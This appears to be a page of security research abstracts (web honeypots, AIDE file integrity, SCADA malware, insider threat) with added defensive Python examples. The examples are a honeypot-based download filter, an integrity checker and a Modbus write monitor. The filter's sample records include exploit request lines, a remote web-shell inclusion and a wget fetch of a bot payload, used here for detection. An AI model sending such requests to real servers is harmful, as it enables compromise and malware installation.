    Yagi, Takeshi; Tanimoto, Naoto; Hariu, Takeo; Itoh, Mitsutaka

    Vulnerabilities in web applications expose computer networks to security threats, and many websites are used by attackers as hopping sites to attack other websites and user terminals. These incidents prevent service providers from constructing secure networking environments. To protect websites from attacks exploiting vulnerabilities in web applications, service providers use web application firewalls (WAFs). WAFs filter accesses from attackers by using signatures, which are generated based on the exploit codes of previous attacks. However, WAFs cannot filter unknown attacks because the signatures cannot reflect new types of attacks. In service provider environments, the number of exploit codes has recently increased rapidly because of the spread of vulnerable web applications that have been deployed through cloud computing. Thus, generating signatures for all exploit codes is difficult. To solve these problems, our proposed scheme detects and filters malware downloads that are sent from websites which have already received exploit codes. In addition, to collect information for detecting malware downloads, web honeypots, which automatically extract the communication records of exploit codes, are used. According to the results of experiments using a prototype, our scheme can filter attacks automatically so that service providers can provide secure and cost-effective network environments.
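    The scheme's two inputs are visible in the abstract: honeypot records of exploit codes, and the downloads that later flow from the sites those codes hit. The Python block below is an added example of that pipeline in simplified form and is not the authors' prototype. It assumes that an exploit request names the payload it wants fetched (a URL in the query string or body, which is how remote-file-inclusion and command-injection attempts commonly look) and that a site which received an exploit code is treated as a suspect download source afterwards; the honeypot lines and download URLs are constructed for the example.

```python
"""Added example, not the paper's prototype: derive a download filter from
web-honeypot records of exploit codes. Records and URLs are constructed."""
import re
from urllib.parse import unquote, urlsplit

# Constructed honeypot records: (site that received the request, request line).
HONEYPOT_RECORDS = [
    ("shop.example", "GET /cgi-bin/view.php?page=http://198.51.100.7/r57.txt HTTP/1.1"),
    ("shop.example", "POST /upload.php cmd=wget%20http://203.0.113.9/bot.bin HTTP/1.1"),
    ("blog.example", "GET /index.php?id=1 HTTP/1.1"),  # benign probe, no payload URL
]

# Absolute URLs embedded in a request; stops at whitespace, quotes and '&'.
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?/[^\s\"'&]*")


def extract_exploit_urls(request_line):
    """URLs an exploit request points the server at (payload hosts).
    Percent-encoding is undone first so 'wget%20http://...' is found."""
    return URL_RE.findall(unquote(request_line))


def build_filter(records):
    """Two signals: hosts that exploit codes fetch payloads from, and sites
    that were sent exploit codes (assumed to serve malware afterwards)."""
    payload_hosts, exploited_sites = set(), set()
    for site, line in records:
        urls = extract_exploit_urls(line)
        if urls:
            exploited_sites.add(site)
            payload_hosts.update(urlsplit(u).hostname for u in urls)
    return payload_hosts, exploited_sites


def should_block(download_url, payload_hosts, exploited_sites):
    """Block a download if it comes from a payload host or an exploited site."""
    host = urlsplit(download_url).hostname
    return host in payload_hosts or host in exploited_sites


def filter_downloads(download_urls, records=HONEYPOT_RECORDS):
    """Return {url: blocked?} for a batch of observed downloads."""
    payload_hosts, exploited_sites = build_filter(records)
    return {u: should_block(u, payload_hosts, exploited_sites) for u in download_urls}


if __name__ == "__main__":
    observed = [
        "http://203.0.113.9/bot.bin",        # payload host named in an exploit
        "http://shop.example/update.zip",    # site that received exploit code
        "http://cdn.example/app.tar.gz",     # no honeypot evidence
    ]
    for url, blocked in filter_downloads(observed).items():
        print("BLOCK" if blocked else "ALLOW", url)
```

Note that no per-exploit signature is needed: the filter keys on where malware is served from, so a new exploit variant hitting the same site is still caught once any one variant was seen by the honeypot. The flip side is that an entire exploited site is blocked as a download source, which is a deliberate trade-off the operator should be aware of.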

  20. AIDE - Advanced Intrusion Detection Environment

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Smith, Cathy L.

    2013-04-28

    Would you like to know when someone has dropped an undesirable executable binary on your system? What about something less malicious, such as a software installation by a user? What about the user who decides to install a newer version of mod_perl or PHP on your web server without letting you know beforehand? Or even something as simple as an undocumented config file change made by another member of the admin group? Do you even want to know about all the changes that happen on a daily basis on your server? The purpose of an intrusion detection system (IDS) is to detect unauthorized, possibly malicious activity. The purpose of a host-based IDS, or file integrity checker, is to check for unauthorized changes to key system files, binaries, libraries, and directories on the system. AIDE is an Open Source file and directory integrity checker. AIDE will let you know when a file or directory has been added, deleted, or modified. It is included with Red Hat Enterprise Linux 6 and is available for other Linux distros. This is a case study describing the process of configuring AIDE on an out-of-the-box RHEL6 installation. Its goal is to illustrate the thinking and the process by which a useful AIDE configuration is built.
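    What a file integrity checker such as AIDE does underneath (take a baseline of hashes and metadata, later re-walk the tree and report added, removed and changed entries) is small enough to show in full. The Python block below is an added example written for this page, not AIDE's code or its configuration format: it records SHA-256, size, mode and owner per regular file, and its `demo()` builds a constructed directory tree, plants a new binary, edits a config file and deletes another, then reports the differences. Which attributes to track per path is the policy decision an AIDE rule set expresses; here every file gets the same four.

```python
"""Added example, not AIDE itself: a minimal file integrity checker.
The directory tree in demo() is constructed in a temporary directory."""
import hashlib
import os
import stat
import tempfile

TRACKED = ("sha256", "size", "mode", "uid")  # per-file attributes in the baseline


def _digest(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Walk root and record the tracked attributes of every regular file,
    keyed by path relative to root (the equivalent of 'aide --init')."""
    db = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if not stat.S_ISREG(st.st_mode):  # skip symlinks, devices, etc.
                continue
            db[os.path.relpath(p, root)] = {
                "sha256": _digest(p),
                "size": st.st_size,
                "mode": stat.S_IMODE(st.st_mode),
                "uid": st.st_uid,
            }
    return db


def compare(baseline, current):
    """Report added, removed and changed paths; for changed paths list which
    tracked attributes differ (the equivalent of 'aide --check')."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = {}
    for rel in set(baseline) & set(current):
        diffs = [k for k in TRACKED if baseline[rel][k] != current[rel][k]]
        if diffs:
            changed[rel] = diffs
    return {"added": added, "removed": removed, "changed": changed}


def demo():
    """Constructed tree: baseline it, then drop a binary, edit a config file
    and delete another file, and return the comparison."""
    with tempfile.TemporaryDirectory() as root:
        etc, bindir = os.path.join(root, "etc"), os.path.join(root, "bin")
        os.makedirs(etc)
        os.makedirs(bindir)
        with open(os.path.join(etc, "httpd.conf"), "w") as f:
            f.write("Listen 80\n")
        with open(os.path.join(etc, "old.conf"), "w") as f:
            f.write("x\n")
        with open(os.path.join(bindir, "ls"), "wb") as f:
            f.write(b"\x7fELF-ls")
        baseline = build_baseline(root)

        # Changes an operator would want to hear about.
        with open(os.path.join(bindir, "nc"), "wb") as f:
            f.write(b"\x7fELF-nc")
        with open(os.path.join(etc, "httpd.conf"), "a") as f:
            f.write("LoadModule evil_module modules/mod_evil.so\n")
        os.remove(os.path.join(etc, "old.conf"))
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

Two caveats carry over to any deployment: the baseline must be stored where the attacker cannot rewrite it (read-only or off-host), and the checker itself is a file on the system it checks, so its binary belongs in the baseline too.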

  1. Statistics attack on `quantum private comparison with a malicious third party' and its improvement

    NASA Astrophysics Data System (ADS)

    Gu, Jun; Ho, Chih-Yung; Hwang, Tzonelih

    2018-02-01

    Recently, Sun et al. (Quantum Inf Process:14:2125-2133, 2015) proposed a quantum private comparison protocol allowing two participants to compare the equality of their secrets via a malicious third party (TP). They designed an interesting trap comparison method to prevent the TP from knowing the final comparison result. However, this study shows that the malicious TP can use the statistics attack to reveal the comparison result. A simple modification is hence proposed to solve this problem.

  2. When envy leads to schadenfreude.

    PubMed

    van de Ven, Niels; Hoogland, Charles E; Smith, Richard H; van Dijk, Wilco W; Breugelmans, Seger M; Zeelenberg, Marcel

    2015-01-01

    Previous research has yielded inconsistent findings concerning the relationship between envy and schadenfreude. Three studies examined whether the distinction between benign and malicious envy can resolve this inconsistency. We found that malicious envy is related to schadenfreude, while benign envy is not. This result held both in the Netherlands where benign and malicious envy are indicated by separate words (Study 1: Sample A, N = 139; Sample B, N = 150), and in the USA where a single word is used to denote both types (Study 2, N = 180; Study 3, N = 349). Moreover, the effect of malicious envy on schadenfreude was independent of other antecedents of schadenfreude (such as feelings of inferiority, disliking the target person, anger, and perceived deservedness). These findings improve our understanding of the antecedents of schadenfreude and help reconcile seemingly contradictory findings on the relationship between envy and schadenfreude.

  3. Spy the Lie: Detecting Malicious Insiders

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Noonan, Christine F.

    Insider threat is a hard problem. There is no ground truth, there are innumerable variables, and the data is sparse. The types of crimes and abuses associated with insider threats are significant; the most serious include espionage, sabotage, terrorism, embezzlement, extortion, bribery, and corruption. Malicious activities include an even broader range of exploits, such as negligent use of classified data, fraud, cybercrime, unauthorized access to sensitive information, and illicit communications with unauthorized recipients. Inadvertent action or inaction without malicious intent (e.g., disposing of sensitive documents incorrectly) can also cause harm to an organization. This review article will explore insider threat, specifically behaviors, beliefs, and current debates within the field. Additionally, particular focus is given to deception, a significant behavioral component of the malicious insider. Finally, research and policy implications for law enforcement and the intelligence community are addressed.

  4. CernVM WebAPI - Controlling Virtual Machines from the Web

    NASA Astrophysics Data System (ADS)

    Charalampidis, I.; Berzano, D.; Blomer, J.; Buncic, P.; Ganis, G.; Meusel, R.; Segal, B.

    2015-12-01

    Lately, there is a trend in scientific projects to look for computing resources in the volunteering community. In addition, to reduce the development effort required to port the scientific software stack to all the known platforms, the use of Virtual Machines (VMs) is becoming increasingly popular. Unfortunately their use further complicates the software installation and operation, restricting the volunteer audience to sufficiently expert people. CernVM WebAPI is a software solution addressing this specific case in a way that opens wide new application opportunities. It offers a very simple API for setting up, controlling and interfacing with a VM instance on the user's computer, while at the same time relieving the user of all the burden of downloading, installing and configuring the hypervisor. WebAPI comes with a lightweight JavaScript library that guides the user through the application installation process. Malicious usage is prohibited by offering a per-domain PKI validation mechanism. In this contribution we will overview this new technology, discuss its security features and examine some test cases where it is already in use.

  5. Image manipulation: Fraudulence in digital dental records: Study and review

    PubMed Central

    Chowdhry, Aman; Sircar, Keya; Popli, Deepika Bablani; Tandon, Ankita

    2014-01-01

    Introduction: In present-day times, freely available software allows dentists to tweak their digital records as never before. But there is a fine line between acceptable enhancements and scientific delinquency. Aims and Objective: To manipulate digital images (used in forensic dentistry) of casts, lip prints, and bite marks in order to highlight tampering techniques and methods of detecting and preventing manipulation of digital images. Materials and Methods: Digital image records of forensic data (casts, lip prints, and bite marks photographed using a Samsung Techwin L77 digital camera) were manipulated using freely available software. Results: Fake digital images can be created either by merging two or more digital images, or by altering an existing image. Discussion and Conclusion: Retouched digital images can be used for fraudulent purposes in forensic investigations. However, tools are available to detect such digital frauds, which are extremely difficult to assess visually. Thus, all digital content should mandatorily have attached metadata and preferably watermarking in order to avert its malicious re-use. Also, computer awareness, especially about imaging software, should be promoted among forensic odontologists/dental professionals. PMID:24696587

  6. Whatever Happened to Formal Methods for Security?

    PubMed

    Voas, J; Schaffer, K

    2016-08-01

    We asked 7 experts 7 questions to find out what has occurred recently in terms of applying formal methods (FM) to security-centric, cyber problems. We are continually reminded of the 1996 paper by Tony Hoare "How did Software Get So Reliable Without Proof?" [1] In that vein, how did we get so insecure with proof? Given daily press announcements concerning new malware, data breaches, and privacy loss, is FM still relevant or was it ever? Our experts answered with unique personal insights. We were curious as to whether this successful methodology in "safety-critical" has succeeded as well for today's "build it, hack it, patch it" mindset. Our experts were John McLean (Naval Research Labs), Paul Black (National Institute of Standards and Technology), Karl Levitt (University of California at Davis), Joseph Williams (CloudEconomist.Com), Connie Heitmeyer (Naval Research Labs), Eugene Spafford (Purdue University), and Joseph Kiniry (Galois, Inc.). The questions and responses follow.

  7. SIMPL Systems, or: Can We Design Cryptographic Hardware without Secret Key Information?

    NASA Astrophysics Data System (ADS)

    Rührmair, Ulrich

    This paper discusses a new cryptographic primitive termed SIMPL system. Roughly speaking, a SIMPL system is a special type of Physical Unclonable Function (PUF) which possesses a binary description that allows its (slow) public simulation and prediction. Besides this public-key-like functionality, SIMPL systems have another advantage: No secret information is, or needs to be, contained in SIMPL systems in order to enable cryptographic protocols, neither in the form of a standard binary key, nor as secret information hidden in random, analog features, as is the case for PUFs. The cryptographic security of SIMPLs instead rests on (i) a physical assumption on their unclonability, and (ii) a computational assumption regarding the complexity of simulating their output. This novel property makes SIMPL systems potentially immune to many known hardware and software attacks, including malware, side channel, invasive, or modeling attacks.

  8. Towards Reducing the Data Exfiltration Surface for the Insider Threat

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Schlicher, Bob G; MacIntyre, Lawrence Paul; Abercrombie, Robert K

    Unauthorized data exfiltrations from both insiders and outsiders are costly and damaging. Network communication resources can be used for transporting data illicitly out of the enterprise or cloud. Combined with built-in malware copying utilities, we define this as comprising the Data Exfiltration Surface (DXS). For securing valuable data, it is desirable to reduce the DXS and maintain controls on the egress points. Our approach is to host the data in a protected enclave that includes a novel software Data Diode (SDD) installed on a secured border gateway. The SDD allows copying data into the enclave systems but denies data from being copied out. Simultaneously, it permits remote access with remote desktop and console applications. Our tests demonstrate that we are able to effectively reduce the DXS and protect data from being exfiltrated through the use of the SDD.

  9. The effects of malicious nodes on performance of mobile ad hoc networks

    NASA Astrophysics Data System (ADS)

    Li, Fanzhi; Shi, Xiyu; Jassim, Sabah; Adams, Christopher

    2006-05-01

    Wireless ad hoc networking offers convenient infrastructureless communication over the shared wireless channel. However, the nature of ad hoc networks makes them vulnerable to security attacks. Unlike their wired counterparts, infrastructureless ad hoc networks do not have a clear line of defense, their topology is dynamically changing, and every mobile node can receive messages from its neighbors and can be contacted by all other nodes in its neighborhood. This poses a great danger to network security if some nodes behave in a malicious manner. The immediate concern about security in this type of network is how to protect the network and the individual mobile nodes against the malicious acts of rogue nodes from within the network. This paper is concerned with security aspects of wireless ad hoc networks. We shall present results of simulation experiments on ad hoc network performance in the presence of malicious nodes. We shall investigate two types of attacks, and the consequences will be simulated and quantified in terms of loss of packets and other factors. The results show that network performance, in terms of successful packet delivery ratios, significantly deteriorates when malicious nodes act according to the defined misbehaving characteristics.

  10. Impact of malicious servers over trust and reputation models in wireless sensor networks

    NASA Astrophysics Data System (ADS)

    Verma, Vinod Kumar; Singh, Surinder; Pathak, N. P.

    2016-03-01

    This article deals with the impact of malicious servers over different trust and reputation models in wireless sensor networks. First, we analysed five trust and reputation models, namely BTRM-WSN, EigenTrust, PeerTrust, PowerTrust, and the linguistic fuzzy trust model. Further, we proposed a wireless sensor network design for optimisation of these models. Finally, the influence of malicious servers on the behaviour of the above-mentioned trust and reputation models is discussed. Statistical analysis has been carried out to prove the validity of our proposal.

  11. CSIRT Requirements for Situational Awareness

    DTIC Science & Technology

    2014-01-25

    deepsight-products http://www.symantec.com/security_response/publications/threatreport.jsp Verizon Verizon produces an annual data breach report...impact studies to the differences between malicious versus non-malicious data breaches . Ponemon also offers con- sulting services. Ponemon also

  12. Elucidating the Dark Side of Envy: Distinctive Links of Benign and Malicious Envy With Dark Personalities

    PubMed Central

    Lange, Jens; Paulhus, Delroy L.; Crusius, Jan

    2017-01-01

    Researchers have recently drawn a contrast between two forms of envy: benign and malicious envy. In three studies (total N = 3,123), we challenge the assumption that malicious envy is destructive, whereas benign envy is entirely constructive. Instead, both forms have links with the Dark Triad of personality. Benign envy is associated with Machiavellian behaviors, whereas malicious envy is associated with both Machiavellian and psychopathic behaviors. In Study 1, this pattern emerged from meta-analyzed trait correlations. In Study 2, a manipulation affecting the envy forms mediated an effect on antisocial behavioral intentions. Study 3 replicated these patterns by linking envy to specific antisocial behaviors and their impact on status in the workplace. Together, our correlational and experimental results suggest that the two forms of envy can both be malevolent. Instead of evaluating envy’s morality, we propose to focus on its functional value. PMID:29271287

  13. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Belangia, David Warren

    The Home Depot Data Breach is the second largest data breach on record. It has or will affect up to 56 million debit or credit cards. A trusted vendor account, coupled with the use of a previously unknown variant of malware that allowed the establishment of a foothold, was the entry point into the Home Depot network. Once inside the perimeter, privilege escalation provided an avenue to obtain the desired information. Home Depot did, however, learn some lessons from Target. Home Depot certainly communicated better than Target, procured insurance, and instituted as secure an environment as possible. There are specific measures an institution should undertake to prepare for a data breach, and everyone can learn from this breach. Publicly available information about the Home Depot Data Breach provides insight into the attack, an old malware variant with a new twist. While the malware was modified so as to be unrecognizable with tools, it probably should have been detected. There are also concerns with Home Depot's insurance and the insurance provider's apparent lack of fully reimbursing Home Depot for their losses. The effect on shareholders and Home Depot's stock price was short lived. This story is still evolving but provides interesting lessons learned concerning how an organization should prepare for its inevitable breach.

  14. An overview of computer viruses in a research environment

    NASA Technical Reports Server (NTRS)

    Bishop, Matt

    1991-01-01

    The threat of attack by computer viruses is in reality a very small part of a much more general threat, specifically threats aimed at subverting computer security. Here, computer viruses are examined as a malicious logic in a research and development environment. A relation is drawn between the viruses and various models of security and integrity. Current research techniques aimed at controlling the threats posed to computer systems by threatening viruses in particular and malicious logic in general are examined. Finally, a brief examination of the vulnerabilities of research and development systems that malicious logic and computer viruses may exploit is undertaken.

  15. Modelling Metamorphism by Abstract Interpretation

    NASA Astrophysics Data System (ADS)

    Dalla Preda, Mila; Giacobazzi, Roberto; Debray, Saumya; Coogan, Kevin; Townsend, Gregg M.

    Metamorphic malware applies semantics-preserving transformations to its own code in order to foil detection systems based on signature matching. In this paper we consider the problem of automatically extracting metamorphic signatures from such malware. We introduce a semantics for self-modifying code, later called phase semantics, and prove its correctness by showing that it is an abstract interpretation of the standard trace semantics. Phase semantics precisely models the metamorphic code behavior by providing a set of traces of programs which correspond to the possible evolutions of the metamorphic code during execution. We show that metamorphic signatures can be automatically extracted by abstract interpretation of the phase semantics, and that regular metamorphism can be modelled as a finite state automata abstraction of the phase semantics.

  16. Scada Malware, a Proof of Concept

    NASA Astrophysics Data System (ADS)

    Carcano, Andrea; Fovino, Igor Nai; Masera, Marcelo; Trombetta, Alberto

    Critical Infrastructures are nowadays exposed to new kinds of threats. The cause of such threats is related to the large number of new vulnerabilities and architectural weaknesses introduced by the extensive use of ICT and network technologies in such complex critical systems. Of particular interest are the vulnerabilities related to the class of communication protocols normally known as "SCADA" protocols, under which fall all the communication protocols used to remotely control the RTU devices of an industrial system. In this paper we present a proof of concept of the potential effects of a set of computer malware specifically designed and created in order to impact a typical Supervisory Control and Data Acquisition system by taking advantage of some vulnerabilities of the Modbus protocol.
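    The abstract does not detail which Modbus weaknesses the proof-of-concept malware uses, but the protocol's well-known property that any host able to reach the RTU can issue write requests is what a monitor on the SCADA segment would watch for. The Python block below is an added example written for this page and not the authors' malware or tooling: it parses Modbus/TCP frames (the 7-byte MBAP header followed by the function code and data, as the Modbus specification defines them) and flags state-changing function codes from sources outside an allow-list of masters, as well as frames that do not parse. The frames, addresses and allow-list are constructed.

```python
"""Added example, not the paper's code: a Modbus/TCP write monitor for a
SCADA segment. Frames and addresses below are constructed."""
import struct
from collections import namedtuple

Frame = namedtuple("Frame", "transaction protocol length unit function data")

# Function codes that change process state (public Modbus application spec).
WRITE_FUNCTIONS = {
    5: "Write Single Coil",
    6: "Write Single Register",
    15: "Write Multiple Coils",
    16: "Write Multiple Registers",
    23: "Read/Write Multiple Registers",
}


def parse_modbus_tcp(payload):
    """MBAP header: transaction id (2), protocol id (2, always 0), length (2,
    counts unit id + PDU), unit id (1); then PDU: function code (1) + data.
    Raises ValueError on malformed input, which is itself worth an alert."""
    if len(payload) < 8:
        raise ValueError("short frame")
    tid, pid, length, unit, fc = struct.unpack(">HHHBB", payload[:8])
    if pid != 0:
        raise ValueError("protocol id must be 0 for Modbus/TCP")
    if length != len(payload) - 6:
        raise ValueError("length field does not match payload")
    return Frame(tid, pid, length, unit, fc, payload[8:])


def check(src_ip, payload, allowed_masters):
    """Findings for one request from src_ip: unauthorised writes and bad frames."""
    try:
        fr = parse_modbus_tcp(payload)
    except ValueError as e:
        return [f"malformed frame from {src_ip}: {e}"]
    findings = []
    if fr.function in WRITE_FUNCTIONS and src_ip not in allowed_masters:
        findings.append(
            f"unauthorised {WRITE_FUNCTIONS[fr.function]} from {src_ip} to unit {fr.unit}"
        )
    # Write Single Coil only allows 0xFF00 (on) or 0x0000 (off) as the value.
    if fr.function == 5 and fr.data[2:4] not in (b"\xff\x00", b"\x00\x00"):
        findings.append(f"invalid coil value from {src_ip}")
    return findings


def build_request(tid, unit, function, data):
    """Helper to construct well-formed Modbus/TCP requests for the example."""
    pdu = bytes([function]) + data
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def audit(events, allowed_masters):
    """Run check() over (src_ip, payload) pairs; return only the flagged ones."""
    return [(src, check(src, p, allowed_masters)) for src, p in events
            if check(src, p, allowed_masters)]


# Constructed traffic: the HMI is the only legitimate master.
ALLOWED = {"10.0.0.5"}
EVENTS = [
    ("10.0.0.5", build_request(1, 1, 5, b"\x00\x10\xff\x00")),   # HMI sets coil 16
    ("10.0.0.99", build_request(2, 1, 5, b"\x00\x10\x00\x00")),  # rogue host clears it
    ("10.0.0.99", build_request(3, 1, 3, b"\x00\x00\x00\x0a")),  # rogue read, not flagged
    ("10.0.0.99", b"\x00\x04\x00\x00"),                          # truncated frame
]

if __name__ == "__main__":
    for src, findings in audit(EVENTS, ALLOWED):
        print(src, findings)
```

Reads from unexpected hosts are left unflagged here on purpose; whether reconnaissance reads also warrant an alert is a per-site decision, and adding function code 3 to the watched set is a one-line change.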

  17. Incentives, Behavior, and Risk Management

    ERIC Educational Resources Information Center

    Liu, Debin

    2011-01-01

    Insiders are one of the most serious threats to an organization's information assets. Generally speaking, there are two types of insider threats based on the insiders' intents. Malicious Insiders are individuals with varying degrees of harmful intentions. Inadvertent Insiders are individuals without malicious intent. In this dissertation, I…

  18. Integrating Multiple Data Views for Improved Malware Analysis

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Anderson, Blake H.

    2014-01-31

    Exploiting multiple views of a program makes obfuscating the intended behavior of a program more difficult allowing for better performance in classification, clustering, and phylogenetic reconstruction.

  19. Security and privacy qualities of medical devices: an analysis of FDA postmarket surveillance.

    PubMed

    Kramer, Daniel B; Baker, Matthew; Ransford, Benjamin; Molina-Markham, Andres; Stewart, Quinn; Fu, Kevin; Reynolds, Matthew R

    2012-01-01

    Medical devices increasingly depend on computing functions such as wireless communication and Internet connectivity for software-based control of therapies and network-based transmission of patients' stored medical information. These computing capabilities introduce security and privacy risks, yet little is known about the prevalence of such risks within the clinical setting. We used three comprehensive, publicly available databases maintained by the Food and Drug Administration (FDA) to evaluate recalls and adverse events related to security and privacy risks of medical devices. Review of weekly enforcement reports identified 1,845 recalls; 605 (32.8%) of these included computers, 35 (1.9%) stored patient data, and 31 (1.7%) were capable of wireless communication. Searches of databases specific to recalls and adverse events identified only one event with a specific connection to security or privacy. Software-related recalls were relatively common, and most (81.8%) mentioned the possibility of upgrades, though only half of these provided specific instructions for the update mechanism. Our review of recalls and adverse events from federal government databases reveals sharp inconsistencies with databases at individual providers with respect to security and privacy risks. Recalls related to software may increase security risks because of unprotected update and correction mechanisms. To detect signals of security and privacy problems that adversely affect public health, federal postmarket surveillance strategies should rethink how to effectively and efficiently collect data on security and privacy problems in devices that increasingly depend on computing systems susceptible to malware.

  20. Security and Privacy Qualities of Medical Devices: An Analysis of FDA Postmarket Surveillance

    PubMed Central

    Kramer, Daniel B.; Baker, Matthew; Ransford, Benjamin; Molina-Markham, Andres; Stewart, Quinn; Fu, Kevin; Reynolds, Matthew R.

    2012-01-01

    Background: Medical devices increasingly depend on computing functions such as wireless communication and Internet connectivity for software-based control of therapies and network-based transmission of patients' stored medical information. These computing capabilities introduce security and privacy risks, yet little is known about the prevalence of such risks within the clinical setting. Methods: We used three comprehensive, publicly available databases maintained by the Food and Drug Administration (FDA) to evaluate recalls and adverse events related to security and privacy risks of medical devices. Results: Review of weekly enforcement reports identified 1,845 recalls; 605 (32.8%) of these included computers, 35 (1.9%) stored patient data, and 31 (1.7%) were capable of wireless communication. Searches of databases specific to recalls and adverse events identified only one event with a specific connection to security or privacy. Software-related recalls were relatively common, and most (81.8%) mentioned the possibility of upgrades, though only half of these provided specific instructions for the update mechanism. Conclusions: Our review of recalls and adverse events from federal government databases reveals sharp inconsistencies with databases at individual providers with respect to security and privacy risks. Recalls related to software may increase security risks because of unprotected update and correction mechanisms. To detect signals of security and privacy problems that adversely affect public health, federal postmarket surveillance strategies should rethink how to effectively and efficiently collect data on security and privacy problems in devices that increasingly depend on computing systems susceptible to malware. PMID:22829874

  1. Malicious Use of Nonpharmaceuticals in Children

    ERIC Educational Resources Information Center

    Yin, Shan

    2011-01-01

    Objective: The objective of this study was to describe malicious nonpharmaceutical exposures in children reported to US poison centers. Methods: We performed a retrospective study of all nonpharmaceutical exposures involving children 7 years old reported to the US National Poison Data System (NPDS) from 2000 to 2008 for which the reason for…

  2. Study of the stability of a SEIRS model for computer worm propagation

    NASA Astrophysics Data System (ADS)

    Hernández Guillén, J. D.; Martín del Rey, A.; Hernández Encinas, L.

    2017-08-01

    Nowadays, malware is the most important threat to information security. In this sense, several mathematical models to simulate malware spreading have appeared. They are compartmental models in which the population of devices is classified into different compartments: susceptible, exposed, infectious, recovered, etc. The main goal of this work is to propose an improved SEIRS (Susceptible-Exposed-Infectious-Recovered-Susceptible) mathematical model to simulate computer worm propagation. It is a continuous model whose dynamics are governed by a system of ordinary differential equations. It considers more realistic parameters related to the propagation; in fact, a modified incidence rate has been used. Moreover, the equilibrium points are computed and their local and global stability are analysed. From the explicit expression of the basic reproductive number, efficient control measures are also obtained.

  3. VeryVote: A Voter Verifiable Code Voting System

    NASA Astrophysics Data System (ADS)

    Joaquim, Rui; Ribeiro, Carlos; Ferreira, Paulo

    Code voting is a technique used to address the secure platform problem of remote voting. A code voting system consists of secretly sending, e.g. by mail, code sheets to voters that map their choices to entry codes on their ballot. While voting, the voter uses the code sheet to know which code to enter in order to vote for a particular candidate. In effect, the voter performs the vote encryption and, since no malicious software on the PC has access to the code sheet, it is not able to change the voter's intention. However, without compromising the voter's privacy, the vote codes are not enough to prove that the vote is recorded and counted as cast by the election server.

  4. Detecting Targeted Malicious Email through Supervised Classification of Persistent Threat and Recipient Oriented Features

    ERIC Educational Resources Information Center

    Amin, Rohan Mahesh

    2010-01-01

    Targeted email attacks to enable computer network exploitation have become more prevalent, more insidious, and more widely documented in recent years. Beyond nuisance spam or phishing designed to trick users into revealing personal information, targeted malicious email (TME) facilitates computer network exploitation and the gathering of sensitive…

  5. Concurrent and Short-Term Longitudinal Associations between Peer Victimization and School and Recess Liking during Middle Childhood

    ERIC Educational Resources Information Center

    Boulton, Michael J.; Chau, Cam; Whitehand, Caroline; Amataya, Kishori; Murray, Lindsay

    2009-01-01

    Background: Prior studies outside of the UK have shown that peer victimization is negatively associated with school adjustment. Aims: To examine concurrent and short-term longitudinal associations between peer victimization (physical, malicious teasing, deliberate social exclusion, and malicious gossiping) and two measures of school adjustment…

  6. Whatever Happened to Formal Methods for Security?

    PubMed Central

    Voas, J.; Schaffer, K.

    2016-01-01

    We asked 7 experts 7 questions to find out what has occurred recently in terms of applying formal methods (FM) to security-centric, cyber problems. We are continually reminded of the 1996 paper by Tony Hoare “How did Software Get So Reliable Without Proof?” [1] In that vein, how did we get so insecure with proof? Given daily press announcements concerning new malware, data breaches, and privacy loss, is FM still relevant or was it ever? Our experts answered with unique personal insights. We were curious as to whether this successful methodology in “safety-critical” has succeeded as well for today’s “build it, hack it, patch it” mindset. Our experts were John McLean (Naval Research Labs), Paul Black (National Institute of Standards and Technology), Karl Levitt (University of California at Davis), Joseph Williams (CloudEconomist.Com), Connie Heitmeyer (Naval Research Labs), Eugene Spafford (Purdue University), and Joseph Kiniry (Galois, Inc.). The questions and responses follow. PMID:27890940

  7. Preventing and Profiling Malicious Insider Attacks

    DTIC Science & Technology

    2012-04-01

    malicious insiders. This research program could also be extended to look at general human factors issues surrounding information security behaviours... behaviours. This research also draws on corresponding studies into fraud and espionage in non-IT scenarios. A range of preventative measures is... This includes motivating factors, personality traits and observable behaviours that may assist organisations in the detection and profiling of

  8. Crowdsourcing contest dilemma

    PubMed Central

    Naroditskiy, Victor; Jennings, Nicholas R.; Van Hentenryck, Pascal; Cebrian, Manuel

    2014-01-01

    Crowdsourcing offers unprecedented potential for solving tasks efficiently by tapping into the skills of large groups of people. A salient feature of crowdsourcing—its openness of entry—makes it vulnerable to malicious behaviour. Such behaviour took place in a number of recent popular crowdsourcing competitions. We provide game-theoretic analysis of a fundamental trade-off between the potential for increased productivity and the possibility of being set back by malicious behaviour. Our results show that in crowdsourcing competitions malicious behaviour is the norm, not the anomaly—a result contrary to the conventional wisdom in the area. Counterintuitively, making the attacks more costly does not deter them but leads to a less desirable outcome. These findings have cautionary implications for the design of crowdsourcing competitions. PMID:25142518

  9. Deterring Malicious Behavior in Cyberspace

    DTIC Science & Technology

    2015-01-01

    Malicious Behavior in Cyberspace Strategic Studies Quarterly ♦ Spring 2015 [ 79 ] 8. Chris Pepper, ed., Defending against Denial of Service Attacks... Jackson Higgins, "Chinese Cyberespionage Tool Updated for Traditional Cybercrime," Dark Reading, 27 November 2012, http://www.darkreading.com/attacks... content /uploads/sites/43/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf. 13. Kelly Jackson Higgins, "'NetTraveler' Cyberespionage Campaign

  10. Data threats analysis and prevention on iOS platform

    NASA Astrophysics Data System (ADS)

    Gao, Bo; Wang, Yi; Chen, Zhou; Tang, Jiqiang

    2015-12-01

    Background: The rapid growth of mobile internet has driven the rapid popularity of smart mobiles. iOS device is chosen by more and more people for its humanity, stability and excellent industrial design, and the data security problem that followed it has gradually attracted the researchers' attention. Method & Result: This thesis focuses on the analysis of current situation of data security on iOS platform, from both security mechanism and data risk, and proposes countermeasures. Conclusion: From practical work, many problems of data security mechanism on iOS platform still exist. At present, the problem of malicious software towards iOS system has not been severe, but how to ensure the security of data on iOS platform will inevitably become one of the directions for our further study.

